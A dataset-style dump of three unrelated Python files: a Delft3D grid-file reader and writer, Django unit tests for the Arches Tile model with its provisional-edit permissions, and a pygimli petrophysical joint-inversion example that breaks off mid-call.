content stringlengths 5 1.05M |
|---|
import re
import matplotlib.pyplot as plt
import numpy as np
from pyproj import CRS, Transformer
class GrdFile(object):
    """
    Read, modify, visualize, export and write Delft3D grd (grid) files.

    Attributes
    ----------
    filename : str
        Path of the grd file.
    x, y : ndarray of shape (n, m)
        Grid coordinates.
    header : dict
        'Coordinate System' (str or None), 'Missing Value' (float, 0 when
        absent from the file) and 'MN' ([m, n] grid dimensions).

    Examples
    --------
    >>> import delft3d
    >>> grd = delft3d.GrdFile('example/example1.grd')
    """

    def __init__(self, filename):
        self.filename = filename
        self.x, self.y = None, None
        self.header = {}
        self.load_file()

    def load_file(self):
        """Parse the grd file into ``self.header``, ``self.x`` and ``self.y``."""
        with open(self.filename, 'r') as f:
            data = f.read()
        # --- headers ---
        coordinate_system = re.search(r'Coordinate System = ([\w]+)', data)
        self.header['Coordinate System'] = coordinate_system.group(1) if coordinate_system else None
        missing_value = re.search(r'Missing Value\s+=\s+([\w+-.]+)', data)
        # np.float was deprecated in NumPy 1.20 and removed in 1.24;
        # the builtin float is the documented equivalent.
        self.header['Missing Value'] = float(missing_value.group(1)) if missing_value else 0
        # the first "   m   n" line gives the grid dimensions
        mn = re.search(r'\n\s+([\d]+)\s+([\d]+)\n', data)
        m, n = int(mn.group(1)), int(mn.group(2))
        self.header['MN'] = [m, n]
        # --- coordinates: the first n "ETA=" records hold x, the next n hold y ---
        x, y = [], []
        pattern = r' ETA=\s+\d+(\s+[\d.Ee+-]+\n?){' + str(m) + '}'
        for index, match in enumerate(re.finditer(pattern, data)):
            # drop the "ETA=" token and the record number, keep the m values
            cor = [float(num) for num in match[0].split()[2:]]
            if index < n:
                x.extend(cor)
            else:
                y.extend(cor)
        # reshape the flat value lists back to the (n, m) grid layout
        self.x = np.array(x).reshape(n, m)
        self.y = np.array(y).reshape(n, m)

    def spherical_to_cartesian(self, sph_epsg=4326, car_epsg=3857):
        """
        Convert from spherical coordinates to cartesian coordinates in place.

        Default spherical coordinate system: WGS 84.
        Default cartesian coordinate system: WGS_1984_Web_Mercator_Auxiliary_Sphere.
        Find the EPSG of more coordinate systems at
        https://developers.arcgis.com/javascript/3/jshelp/pcs.htm

        Parameters
        ----------
        sph_epsg : int, optional
            EPSG of the original spherical coordinate system
        car_epsg : int, optional
            EPSG of the objective cartesian coordinate system

        Examples
        ----------
        >>> import delft3d
        >>> grd = delft3d.GrdFile('example/example1.grd')
        >>> grd.spherical_to_cartesian()
        >>> grd.spherical_to_cartesian(sph_epsg=4326, car_epsg=26917)
        """
        # no-op when the grid is already cartesian
        if self.header['Coordinate System'] == 'Cartesian':
            return
        projection = Transformer.from_crs(CRS.from_epsg(sph_epsg),
                                          CRS.from_epsg(car_epsg))
        # update coordinates and header together so they stay consistent
        self.x, self.y = projection.transform(self.x, self.y)
        self.header['Coordinate System'] = 'Cartesian'

    def cartesian_to_spherical(self, car_epsg=3857, sph_epsg=4326):
        """
        Convert from cartesian coordinates to spherical coordinates in place.

        Default spherical coordinate system: WGS 84.
        Default cartesian coordinate system: WGS_1984_Web_Mercator_Auxiliary_Sphere.
        Find the EPSG of more coordinate systems at
        https://developers.arcgis.com/javascript/3/jshelp/pcs.htm

        Parameters
        ----------
        car_epsg : int, optional
            EPSG of the original cartesian coordinate system
        sph_epsg : int, optional
            EPSG of the objective spherical coordinate system

        Examples
        ----------
        >>> import delft3d
        >>> grd = delft3d.GrdFile('example/example1.grd')
        >>> grd.cartesian_to_spherical()
        >>> grd.cartesian_to_spherical(car_epsg=26917, sph_epsg=4326)
        """
        # no-op when the grid is already spherical
        if self.header['Coordinate System'] == 'Spherical':
            return
        projection = Transformer.from_crs(CRS.from_epsg(car_epsg),
                                          CRS.from_epsg(sph_epsg))
        self.x, self.y = projection.transform(self.x, self.y)
        self.header['Coordinate System'] = 'Spherical'

    def get_nearest_grid(self, x, y, sph_epsg=4326, car_epsg=3857):
        """
        Find the nearest grid point for the given coordinate.

        If the grid's coordinate system is spherical, it is automatically
        converted to cartesian (without modifying the stored grid) so that
        euclidean distances are meaningful. Specify the EPSG codes via
        sph_epsg and car_epsg. Find the EPSG of more coordinate systems at
        https://developers.arcgis.com/javascript/3/jshelp/pcs.htm

        Parameters
        ----------
        x : float
            x coordinate.
        y : float
            y coordinate.
        sph_epsg : int, optional
            The EPSG of the spherical coordinate system.
        car_epsg : int, optional
            The EPSG of the cartesian coordinate system.

        Returns
        -------
        m, n : tuple
            (m, n) index of the nearest grid point.

        Examples
        --------
        >>> import delft3d
        >>> grd = delft3d.GrdFile('example/example1.grd')
        >>> m1, n1 = grd.get_nearest_grid(505944.89, 2497013.47)
        >>> m2, n2 = grd.get_nearest_grid(505944.89, 2497013.47, sph_epsg=4326, car_epsg=26917)
        """
        if self.header['Coordinate System'] == 'Spherical':
            # project a temporary copy to cartesian; self.x/self.y stay untouched
            projection = Transformer.from_crs(CRS.from_epsg(sph_epsg),
                                              CRS.from_epsg(car_epsg))
            grd_x, grd_y = projection.transform(self.x, self.y)
            print("Automatically transform from spherical to cartesian coordinates.\n"
                  "Change the default projection by giving specific grd_epsg and plot_epsg")
        else:
            grd_x, grd_y = self.x, self.y
        # euclidean distance from (x, y) to every grid point
        dis = np.sqrt((x - grd_x.ravel()) ** 2 + (y - grd_y.ravel()) ** 2)
        # map the flat argmin index back onto the (n, m) grid layout
        n, m = np.unravel_index(np.argmin(dis),
                                (self.header['MN'][1], self.header['MN'][0]))
        return m, n

    def plot(self, filename=None, sph_epsg=4326, car_epsg=3857):
        """
        Visualize the grid.

        If the coordinate system is spherical, it is automatically converted
        to cartesian for display (the stored grid is not modified). Specify
        the EPSG codes via sph_epsg and car_epsg. Find the EPSG of more
        coordinate systems at
        https://developers.arcgis.com/javascript/3/jshelp/pcs.htm

        Parameters
        ----------
        filename : str, optional
            If given, the figure is saved under this filename.
        sph_epsg : int, optional
            The EPSG of the spherical coordinate system.
        car_epsg : int, optional
            The EPSG of the cartesian coordinate system.

        Examples
        -------
        >>> import delft3d
        >>> grd = delft3d.GrdFile('example/example1.grd')
        >>> grd.plot()
        >>> grd.plot('test.jpg')
        >>> grd.plot(sph_epsg=4326, car_epsg=26917)
        """
        if self.header['Coordinate System'] == 'Spherical':
            # project a display copy to cartesian
            projection = Transformer.from_crs(CRS.from_epsg(sph_epsg),
                                              CRS.from_epsg(car_epsg))
            x, y = projection.transform(self.x, self.y)
            print("Automatically transform from spherical to cartesian coordinates.\n"
                  "Change the default projection by giving specific grd_epsg and plot_epsg")
        else:
            x, y = self.x, self.y
        # work on copies: the missing values below are interpolated in place
        x, y = x.copy(), y.copy()
        # dummy cell array for pcolormesh
        z = np.zeros(np.shape(x))
        invalid = self.header['Missing Value']
        # If any of the four corners of a cell equals the missing value the
        # cell is flagged, so pcolormesh won't draw a distorted quad there.
        for i in range(x.shape[0] - 1):
            for j in range(x.shape[1] - 1):
                if (x[i, j] == invalid or x[i + 1, j] == invalid or
                        x[i, j + 1] == invalid or x[i + 1, j + 1] == invalid):
                    z[i, j] = 1
        # mask the flagged cells so they come out transparent
        z = np.ma.masked_equal(z, 1)
        # Interpolate missing coordinates row by row; otherwise pcolormesh
        # would place vertices at the sentinel value.
        for index, arr in enumerate(x):
            x1 = np.argwhere(arr == invalid).ravel()
            x2 = np.argwhere(arr != invalid).ravel()
            y2 = arr[arr != invalid]
            x[index][x[index] == invalid] = np.interp(x1, x2, y2)
        for index, arr in enumerate(y):
            x1 = np.argwhere(arr == invalid).ravel()
            x2 = np.argwhere(arr != invalid).ravel()
            y2 = arr[arr != invalid]
            y[index][y[index] == invalid] = np.interp(x1, x2, y2)
        # draw the grid as cell outlines only
        fig = plt.figure(figsize=(10, 8))
        ax = fig.add_subplot(111)
        ax.pcolormesh(x, y, z, edgecolor='black',
                      facecolor='none', linewidth=0.005)
        ax.axis('equal')
        if filename:
            plt.savefig(filename)
        plt.show()

    def set_gird(self, x, y, coordinate_system):
        """
        Set a new grid. (The method name keeps its historical spelling
        for backward compatibility.)

        Parameters
        ----------
        x : ndarray
            x coordinates of the new grid, shape (n, m)
        y : ndarray
            y coordinates of the new grid, shape (n, m)
        coordinate_system : str
            The type of coordinate system: 'Spherical' or 'Cartesian'

        Examples
        -------
        >>> import delft3d
        >>> grd = delft3d.GrdFile('example/example1.grd')
        >>> grd_x = np.loadtxt('example/grd_x.txt')
        >>> grd_y = np.loadtxt('example/grd_y.txt')
        >>> grd.set_gird(grd_x, grd_y, 'Cartesian')
        """
        self.x = x
        self.y = y
        self.header['Coordinate System'] = coordinate_system
        # MN is stored as [m, n] = [columns, rows]
        self.header['MN'] = [x.shape[1], x.shape[0]]

    def export(self):
        """
        Export the data as a list of lines in Delft3D grd format.

        Returns
        -------
        list of str
            Header lines followed by the x block and the y block.

        Examples
        -------
        >>> import delft3d
        >>> grd = delft3d.GrdFile('example/example1.grd')
        >>> grd_file = grd.export()
        """
        grd_file = list()
        # header
        grd_file.append("Coordinate System = %s\n" % self.header['Coordinate System'])
        # a zero missing value means the file had no "Missing Value" record
        if self.header['Missing Value'] != 0:
            grd_file.append("Missing Value = %.7e\n" % self.header['Missing Value'])
        grd_file.append("%8d%8d\n" % ((self.header['MN'][0]), self.header['MN'][1]))
        grd_file.append(" 0 0 0\n")
        # grid data: x block first, then y block
        grd_file = self.grid_writer(grd_file, self.x)
        grd_file = self.grid_writer(grd_file, self.y)
        return grd_file

    @staticmethod
    def grid_writer(grd_file, coordinates):
        """Helper of export: append one coordinate array as ETA records.

        Each grid row becomes one " ETA=<row>" record whose values are
        wrapped five per line. Returns a new list; *grd_file* is not mutated.
        """
        grd_file = grd_file.copy()
        for index, row in enumerate(coordinates):
            parts = [" ETA=%5d" % (index + 1)]
            for count, num in enumerate(row):
                parts.append("  %.17E" % num)
                # break the record after every fifth value
                if count % 5 == 4:
                    parts.append("\n")
            # normalize line endings: every emitted line ends with exactly
            # one '\n', whether or not the record length is a multiple of 5
            record = "".join(parts)
            grd_file.extend(seg + '\n' for seg in record.splitlines())
        return grd_file

    def to_file(self, filename):
        """
        Write the data to a Delft3D grd file.

        Parameters
        ----------
        filename : str
            Filename of the grd file.

        Examples
        -------
        >>> import delft3d
        >>> grd = delft3d.GrdFile('example/example1.grd')
        >>> grd.to_file('example1.grd')
        """
        grd_file = self.export()
        with open(filename, 'w') as f:
            f.writelines(grd_file)
|
"""
ARCHES - a program developed to inventory and manage immovable cultural heritage.
Copyright (C) 2013 J. Paul Getty Trust and World Monuments Fund
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU Affero General Public License as
published by the Free Software Foundation, either version 3 of the
License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Affero General Public License for more details.
You should have received a copy of the GNU Affero General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
"""
This file demonstrates writing tests using the unittest module. These will pass
when you run "manage.py test".
Replace this with more appropriate tests for your application.
"""
from tests import test_settings
from tests.base_test import ArchesTestCase
from django.db import connection
from django.core import management
from django.contrib.auth.models import User
from django.http import HttpRequest
from arches.app.models.tile import Tile, TileCardinalityError
# these tests can be run from the command line via
# python manage.py test tests/models/tile_model_tests.py --pattern="*.py" --settings="tests.test_settings"
class TileTests(ArchesTestCase):
    """Unit tests for the Tile model: loading from Python dicts, saving,
    provisional-edit handling, cardinality enforcement and deletion."""

    @classmethod
    def setUpClass(cls):
        # Django requires overridden setUpClass hooks to call super() so the
        # class-level test machinery (fixtures/atomics) is initialized.
        super().setUpClass()
        for path in test_settings.RESOURCE_GRAPH_LOCATIONS:
            management.call_command("packages", operation="import_graphs", source=path)
        # Seed a resource instance and the node groups the tests attach tiles to.
        sql = """
        INSERT INTO public.resource_instances(resourceinstanceid, legacyid, graphid, createdtime)
        VALUES ('40000000-0000-0000-0000-000000000000', '40000000-0000-0000-0000-000000000000', '2f7f8e40-adbc-11e6-ac7f-14109fd34195', '1/1/2000');
        INSERT INTO node_groups(nodegroupid, legacygroupid, cardinality)
        VALUES ('99999999-0000-0000-0000-000000000001', '', 'n');
        INSERT INTO node_groups(nodegroupid, legacygroupid, cardinality)
        VALUES ('32999999-0000-0000-0000-000000000000', '', 'n');
        INSERT INTO node_groups(nodegroupid, legacygroupid, cardinality)
        VALUES ('19999999-0000-0000-0000-000000000000', '', 'n');
        INSERT INTO node_groups(nodegroupid, legacygroupid, cardinality)
        VALUES ('21111111-0000-0000-0000-000000000000', '', 'n');
        """
        cursor = connection.cursor()
        cursor.execute(sql)

    @classmethod
    def tearDownClass(cls):
        # Remove the rows seeded in setUpClass, then let Django tear down
        # its class-level machinery.
        sql = """
        DELETE FROM public.node_groups
        WHERE nodegroupid = '99999999-0000-0000-0000-000000000001' OR
              nodegroupid = '32999999-0000-0000-0000-000000000000' OR
              nodegroupid = '19999999-0000-0000-0000-000000000000' OR
              nodegroupid = '21111111-0000-0000-0000-000000000000';
        DELETE FROM public.resource_instances
        WHERE resourceinstanceid = '40000000-0000-0000-0000-000000000000';
        """
        cursor = connection.cursor()
        cursor.execute(sql)
        super().tearDownClass()

    def setUp(self):
        # Each test starts with an empty tiles table.
        cursor = connection.cursor()
        cursor.execute("Truncate public.tiles Cascade;")

    def tearDown(self):
        pass

    def test_load_from_python_dict(self):
        """
        Test that we can initialize a Tile object from a Python dictionary
        """
        json = {
            "tiles": [
                {
                    "tiles": [],
                    "resourceinstance_id": "40000000-0000-0000-0000-000000000000",
                    "parenttile_id": "",
                    "nodegroup_id": "19999999-0000-0000-0000-000000000000",
                    "tileid": "",
                    "data": {
                        "20000000-0000-0000-0000-000000000004": "TEST 1",
                        "20000000-0000-0000-0000-000000000002": "TEST 2",
                        "20000000-0000-0000-0000-000000000003": "TEST 3",
                    },
                },
                {
                    "tiles": [],
                    "resourceinstance_id": "40000000-0000-0000-0000-000000000000",
                    "parenttile_id": "",
                    "nodegroup_id": "32999999-0000-0000-0000-000000000000",
                    "tileid": "",
                    "data": {"20000000-0000-0000-0000-000000000004": "TEST 4", "20000000-0000-0000-0000-000000000002": "TEST 5"},
                },
            ],
            "resourceinstance_id": "40000000-0000-0000-0000-000000000000",
            "parenttile_id": "",
            "nodegroup_id": "20000000-0000-0000-0000-000000000001",
            "tileid": "",
            "data": {},
        }
        t = Tile(json)
        self.assertEqual(t.resourceinstance_id, "40000000-0000-0000-0000-000000000000")
        self.assertEqual(t.data, {})
        self.assertEqual(t.tiles[0].data["20000000-0000-0000-0000-000000000004"], "TEST 1")

    def test_save(self):
        """
        Test that we can save a Tile object back to the database
        """
        self.client.login(username="admin", password="admin")
        json = {
            "tiles": [
                {
                    "tiles": [],
                    "resourceinstance_id": "40000000-0000-0000-0000-000000000000",
                    "parenttile_id": "",
                    "nodegroup_id": "72048cb3-adbc-11e6-9ccf-14109fd34195",
                    "tileid": "",
                    "data": {"72048cb3-adbc-11e6-9ccf-14109fd34195": "TEST 1"},
                }
            ],
            "resourceinstance_id": "40000000-0000-0000-0000-000000000000",
            "parenttile_id": "",
            "nodegroup_id": "7204869c-adbc-11e6-8bec-14109fd34195",
            "tileid": "",
            "data": {},
        }
        t = Tile(json)
        t.save(index=False)
        # parent tile plus the one nested tile
        tiles = Tile.objects.filter(resourceinstance_id="40000000-0000-0000-0000-000000000000")
        self.assertEqual(tiles.count(), 2)

    def test_simple_get(self):
        """
        Test that we can get a Tile object
        """
        json = {
            "resourceinstance_id": "40000000-0000-0000-0000-000000000000",
            "parenttile_id": "",
            "nodegroup_id": "72048cb3-adbc-11e6-9ccf-14109fd34195",
            "tileid": "",
            "data": {"72048cb3-adbc-11e6-9ccf-14109fd34195": "TEST 1"},
        }
        t = Tile(json)
        t.save(index=False)
        t2 = Tile.objects.get(tileid=t.tileid)
        self.assertEqual(t.tileid, t2.tileid)
        self.assertEqual(t2.data["72048cb3-adbc-11e6-9ccf-14109fd34195"], "TEST 1")

    def test_create_new_authoritative(self):
        """
        Test that a new authoritative tile is created when a user IS a reviwer.
        """
        self.user = User.objects.get(username="admin")
        json = {
            "resourceinstance_id": "40000000-0000-0000-0000-000000000000",
            "parenttile_id": "",
            "nodegroup_id": "72048cb3-adbc-11e6-9ccf-14109fd34195",
            "tileid": "",
            "data": {"72048cb3-adbc-11e6-9ccf-14109fd34195": "AUTHORITATIVE"},
        }
        authoritative_tile = Tile(json)
        request = HttpRequest()
        request.user = self.user
        authoritative_tile.save(index=False, request=request)
        self.assertEqual(authoritative_tile.is_provisional(), False)

    def test_create_new_provisional(self):
        """
        Test that a new provisional tile is created when a user IS NOT a reviwer.
        """
        self.user = User.objects.create_user(username="testuser", password="TestingTesting123!")
        json = {
            "resourceinstance_id": "40000000-0000-0000-0000-000000000000",
            "parenttile_id": "",
            "nodegroup_id": "72048cb3-adbc-11e6-9ccf-14109fd34195",
            "tileid": "",
            "data": {"72048cb3-adbc-11e6-9ccf-14109fd34195": "PROVISIONAL"},
        }
        provisional_tile = Tile(json)
        request = HttpRequest()
        request.user = self.user
        provisional_tile.save(index=False, request=request)
        self.assertEqual(provisional_tile.is_provisional(), True)

    def test_save_provisional_from_athoritative(self):
        """
        Test that a provisional edit is created when a user that is not a
        reviewer edits an athoritative tile
        """
        json = {
            "tiles": [
                {
                    "tiles": [],
                    "resourceinstance_id": "40000000-0000-0000-0000-000000000000",
                    "parenttile_id": "",
                    "nodegroup_id": "72048cb3-adbc-11e6-9ccf-14109fd34195",
                    "tileid": "",
                    "data": {"72048cb3-adbc-11e6-9ccf-14109fd34195": "AUTHORITATIVE"},
                }
            ],
            "resourceinstance_id": "40000000-0000-0000-0000-000000000000",
            "parenttile_id": "",
            "nodegroup_id": "7204869c-adbc-11e6-8bec-14109fd34195",
            "tileid": "",
            "data": {},
        }
        t = Tile(json)
        t.save(index=False)
        self.user = User.objects.create_user(username="testuser", password="TestingTesting123!")
        self.client.login(username="testuser", password="TestingTesting123!")
        tiles = Tile.objects.filter(resourceinstance_id="40000000-0000-0000-0000-000000000000")
        # grab one of the saved tiles and edit it as a non-reviewer
        provisional_tile = None
        for tile in tiles:
            provisional_tile = tile
        provisional_tile.data["72048cb3-adbc-11e6-9ccf-14109fd34195"] = "PROVISIONAL"
        request = HttpRequest()
        request.user = self.user
        provisional_tile.save(index=False, request=request)
        tiles = Tile.objects.filter(resourceinstance_id="40000000-0000-0000-0000-000000000000")
        provisionaledits = provisional_tile.provisionaledits
        # no new tile is created and the authoritative data is untouched;
        # the edit is recorded as a pending provisional edit instead
        self.assertEqual(tiles.count(), 2)
        self.assertEqual(provisional_tile.data["72048cb3-adbc-11e6-9ccf-14109fd34195"], "AUTHORITATIVE")
        self.assertEqual(provisionaledits[str(self.user.id)]["action"], "update")
        self.assertEqual(provisionaledits[str(self.user.id)]["status"], "review")

    def test_tile_cardinality(self):
        """
        Tests that the tile is not saved if the cardinality is violated
        by testin to save a tile with the same values as existing one
        """
        self.user = User.objects.get(username="admin")
        first_json = {
            "resourceinstance_id": "40000000-0000-0000-0000-000000000000",
            "parenttile_id": "",
            "nodegroup_id": "72048cb3-adbc-11e6-9ccf-14109fd34195",
            "tileid": "",
            "data": {"72048cb3-adbc-11e6-9ccf-14109fd34195": "AUTHORITATIVE"},
        }
        first_tile = Tile(first_json)
        request = HttpRequest()
        request.user = self.user
        first_tile.save(index=False, request=request)
        second_json = {
            "resourceinstance_id": "40000000-0000-0000-0000-000000000000",
            "parenttile_id": "",
            "nodegroup_id": "72048cb3-adbc-11e6-9ccf-14109fd34195",
            "tileid": "",
            "data": {"72048cb3-adbc-11e6-9ccf-14109fd34195": "AUTHORITATIVE"},
        }
        second_tile = Tile(second_json)
        with self.assertRaises(TileCardinalityError):
            second_tile.save(index=False, request=request)

    def test_apply_provisional_edit(self):
        """
        Tests that provisional edit data is properly created
        """
        json = {
            "resourceinstance_id": "40000000-0000-0000-0000-000000000000",
            "parenttile_id": "",
            "nodegroup_id": "72048cb3-adbc-11e6-9ccf-14109fd34195",
            "tileid": "",
            "data": {"72048cb3-adbc-11e6-9ccf-14109fd34195": "TEST 1"},
        }
        user = User.objects.create_user(username="testuser", password="TestingTesting123!")
        provisional_tile = Tile(json)
        request = HttpRequest()
        request.user = user
        provisional_tile.save(index=False, request=request)
        provisional_tile.apply_provisional_edit(user, {"test": "test"}, "update")
        provisionaledits = provisional_tile.provisionaledits
        userid = str(user.id)
        self.assertEqual(provisionaledits[userid]["action"], "update")
        self.assertEqual(provisionaledits[userid]["reviewer"], None)
        self.assertEqual(provisionaledits[userid]["value"], {"test": "test"})
        self.assertEqual(provisionaledits[userid]["status"], "review")
        self.assertEqual(provisionaledits[userid]["reviewtimestamp"], None)

    def test_user_owns_provisional(self):
        """
        Tests that a user is the owner of a provisional edit
        """
        json = {
            "resourceinstance_id": "40000000-0000-0000-0000-000000000000",
            "parenttile_id": "",
            "nodegroup_id": "72048cb3-adbc-11e6-9ccf-14109fd34195",
            "tileid": "",
            "data": {"72048cb3-adbc-11e6-9ccf-14109fd34195": "TEST 1"},
        }
        user = User.objects.create_user(username="testuser", password="TestingTesting123!")
        provisional_tile = Tile(json)
        request = HttpRequest()
        request.user = user
        provisional_tile.save(index=False, request=request)
        self.assertEqual(provisional_tile.user_owns_provisional(user), True)

    def test_tile_deletion(self):
        """
        Tests that a tile is deleted when a user is a reviewer or owner.
        """
        json = {
            "resourceinstance_id": "40000000-0000-0000-0000-000000000000",
            "parenttile_id": "",
            "nodegroup_id": "72048cb3-adbc-11e6-9ccf-14109fd34195",
            "tileid": "",
            "data": {"72048cb3-adbc-11e6-9ccf-14109fd34195": "TEST 1"},
        }
        owner = User.objects.create_user(username="testuser", password="TestingTesting123!")
        reviewer = User.objects.get(username="admin")
        # owner can delete their own tile
        tile1 = Tile(json)
        owner_request = HttpRequest()
        owner_request.user = owner
        tile1.save(index=False, request=owner_request)
        tile1.delete(request=owner_request)
        # reviewer can delete any tile
        tile2 = Tile(json)
        reviewer_request = HttpRequest()
        reviewer_request.user = reviewer
        tile2.save(index=False, request=reviewer_request)
        tile2.delete(request=reviewer_request)
        self.assertEqual(len(Tile.objects.all()), 0)

    def test_provisional_deletion(self):
        """
        Tests that a tile is NOT deleted if a user does not have the
        privlages to delete a tile and that the proper provisionaledit is
        applied.
        """
        json = {
            "resourceinstance_id": "40000000-0000-0000-0000-000000000000",
            "parenttile_id": "",
            "nodegroup_id": "72048cb3-adbc-11e6-9ccf-14109fd34195",
            "tileid": "",
            "data": {"72048cb3-adbc-11e6-9ccf-14109fd34195": "TEST 1"},
        }
        provisional_user = User.objects.create_user(username="testuser", password="TestingTesting123!")
        reviewer = User.objects.get(username="admin")
        tile = Tile(json)
        reviewer_request = HttpRequest()
        reviewer_request.user = reviewer
        tile.save(index=False, request=reviewer_request)
        # a non-privileged user's delete must leave the tile in place
        provisional_request = HttpRequest()
        provisional_request.user = provisional_user
        tile.delete(request=provisional_request)
        self.assertEqual(len(Tile.objects.all()), 1)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Example for Petrophysical-Joint-Inversion."""
import numpy as np
import pygimli as pg
from pygimli import meshtools as mt
from pygimli.physics.petro import PetroInversion, JointPetroInversion
from pygimli.physics.petro import transFwdArchieS as ArchieTrans
from pygimli.physics.petro import transFwdWyllieS as WyllieTrans
def createSynthModel():
    """Return the modeling mesh, the porosity distribution and the
    parametric mesh for inversion.

    Returns
    -------
    mesh : pg.Mesh
        Fine simulation mesh with sensor nodes (marker -99) on its boundary.
    paraMesh : pg.Mesh
        Coarser mesh that only reflects the domain geometry (for inversion).
    petro : array
        Cell-wise petrophysical values on *mesh* (region 1 -> 0.9,
        region 2 -> 0.6, region 3 -> 0.3).
    """
    # Create the synthetic model: circular world containing a triangular
    # body and two circular anomalies (marker 3)
    world = mt.createCircle(boundaryMarker=-1, segments=64)
    tri = mt.createPolygon([[-0.8, -0], [-0.5, -0.7], [0.7, 0.5]],
                           isClosed=True, area=0.0015)
    c1 = mt.createCircle(radius=0.2, pos=[-0.2, 0.5], segments=32,
                         area=0.0025, marker=3)
    c2 = mt.createCircle(radius=0.2, pos=[0.32, -0.3], segments=32,
                         area=0.0025, marker=3)
    poly = mt.mergePLC([world, tri, c1, c2])
    poly.addRegionMarker([0.0, 0, 0], 1, area=0.0015)
    poly.addRegionMarker([-0.9, 0, 0], 2, area=0.0015)
    # Sensor positions: nodes with marker -99 on a circle just inside the rim.
    c = mt.createCircle(radius=0.99, segments=16, start=np.pi, end=np.pi*3)
    # Plain loop instead of a side-effect list comprehension (the list the
    # original comprehension built was discarded anyway).
    for p in c.nodes():
        poly.createNode(p.pos(), -99)
    mesh = pg.meshtools.createMesh(poly, q=34.4, smooth=[1, 10])
    mesh.scale(1.0/5.0)
    mesh.rotate([0., 0., 3.1415/3])
    mesh.rotate([0., 0., 3.1415])
    petro = pg.solver.parseArgToArray([[1, 0.9], [2, 0.6], [3, 0.3]],
                                      mesh.cellCount(), mesh)
    # Create the parametric mesh that only reflect the domain geometry
    world = mt.createCircle(boundaryMarker=-1, segments=32, area=0.0051)
    paraMesh = pg.meshtools.createMesh(world, q=34.0, smooth=[1, 10])
    paraMesh.scale(1.0/5.0)
    return mesh, paraMesh, petro
def showModel(ax, model, mesh, petro=1, cMin=None, cMax=None, label=None,
              savefig=None, showMesh=False):
    """Utility function to show and save models for the CG paper.

    Parameters
    ----------
    ax : matplotlib axes or None
        Target axes (passed through to pg.show).
    model : iterable
        Cell values to display on *mesh*.
    mesh : pg.Mesh
        Mesh to draw the model on.
    petro : int or bool, optional
        Truthy: linear color scale (saturation-style plots);
        falsy: logarithmic color scale (resistivity/velocity plots).
    cMin, cMax : float, optional
        Color scale limits; default to 0.3 and 1.0 when omitted.
    label : str, optional
        Colorbar label.
    savefig : str, optional
        When given, the axes are saved via pg.mplviewer.saveAxes.
    showMesh : bool, optional
        Also draw the mesh's cell boundaries.

    Returns
    -------
    ax : matplotlib axes

    NOTE(review): uses the module-level global ``ertData`` (created later in
    this script) for the sensor positions -- confirm the ERT simulation has
    run before calling this function.
    """
    if cMin is None:
        cMin = 0.3
    if cMax is None:
        cMax = 1.0
    if petro:
        # linear color scale for petrophysical (saturation) values
        ax, _ = pg.show(mesh, model, label=label,
                        cMin=cMin, cMax=cMax, logScale=0, ax=ax,
                        cMap='viridis', hold=1)
    else:
        # log color scale for resistivity / velocity
        ax, _ = pg.show(mesh, model, label=label,
                        logScale=1, ax=ax, cMin=cMin, cMax=cMax, hold=1)
    ticks = [-.2, -.1, 0, .1, .2]
    ax.xaxis.set_ticks(ticks)
    ax.yaxis.set_ticks(ticks)
    # overlay the sensor positions (global ertData, see NOTE above)
    pg.mplviewer.drawSensors(ax, ertData.sensorPositions(), diam=0.005)
    # despine(ax=ax, offset=5, trim=True)
    if showMesh:
        pg.mplviewer.drawSelectedMeshBoundaries(ax, mesh.boundaries(),
                                                linewidth=0.3, color="0.2")
    if savefig:
        pg.mplviewer.saveAxes(ax, savefig, adjust=False)
    return ax
# Script starts here
# Axes placeholders; pg.show creates an axis when handed None.
axs = [None]*8
# Create synthetic model
mMesh, pMesh, saturation = createSynthModel()
# Create Petrophysical models: Archie (saturation -> resistivity) and
# Wyllie (saturation -> slowness, inverted below to velocity).
ertTrans = ArchieTrans(rFluid=20, phi=0.3)
res = ertTrans(saturation)
ttTrans = WyllieTrans(vm=4000, phi=0.3)
vel = 1./ttTrans(saturation)
# Simulate synthetic data with appropriate noise
# Sensors are the mesh nodes flagged with marker -99 in createSynthModel.
sensors = mMesh.positions()[mMesh.findNodesIdxByMarker(-99)]
print("-Simulate ERT" + "-" * 50)
ERT = pg.physics.ERTManager(verbose=False)
ertScheme = pg.physics.ert.createERTData(sensors, schemeName='dd', closed=1)
ertData = ERT.simulate(mMesh, res, ertScheme, noiseLevel=0.01)
print("-Simulate Traveltime" + "-" * 50)
TT = pg.physics.Refraction(verbose=False)
ttScheme = pg.physics.traveltime.createRAData(sensors)
ttData = TT.simulate(mMesh, vel, ttScheme, noiseLevel=0.01, noiseAbs=4e-6)
# Classic inversions: resistivity and velocity recovered separately.
print("-ERT" + "-" * 50)
resInv = ERT.invert(ertData, mesh=pMesh, zWeight=1, lam=20)
ERT.inv.echoStatus()
print("-TT" + "-" * 50)
velInv = TT.invert(ttData, mesh=pMesh, lam=100, useGradient=0, zWeight=1)
TT.inv.echoStatus()
# Single-method petrophysical inversions: invert directly for saturation.
print("-ERT-Petro" + "-" * 50)
invERTPetro = PetroInversion(ERT, ertTrans)
satERT = invERTPetro.invert(ertData, mesh=pMesh, limits=[0., 1.], lam=10)
invERTPetro.inv.echoStatus()
print("-TT-Petro" + "-" * 50)
invTTPetro = PetroInversion(TT, ttTrans)
satTT = invTTPetro.invert(ttData, mesh=pMesh, limits=[0., 1.], lam=5)
invTTPetro.inv.echoStatus()
# Petrophysical joint inversion: both data sets, one saturation model.
print("-Joint-Petro" + "-" * 50)
invJointPetro = JointPetroInversion([ERT, TT], [ertTrans, ttTrans])
satJoint = invJointPetro.invert([ertData, ttData], mesh=pMesh,
                                limits=[0., 1.], lam=5)
invJointPetro.inv.echoStatus()
# Show results
ERT.showData(ertData)
TT.showVA(ttData)
showModel(axs[0], saturation, mMesh, showMesh=1,
          label=r'Saturation (${\tt petro}$)', savefig='petro')
showModel(axs[1], res, mMesh, petro=0, cMin=250, cMax=2500, showMesh=1,
          label=r'Resistivity (${\tt res}$) in $\Omega$m',
          savefig='resistivity')
showModel(axs[5], vel, mMesh, petro=0, cMin=1000, cMax=2500, showMesh=1,
          label=r'Velocity (${\tt vel}$) in m$/$s', savefig='velocity')
showModel(axs[2], resInv, pMesh, 0, cMin=250, cMax=2500,
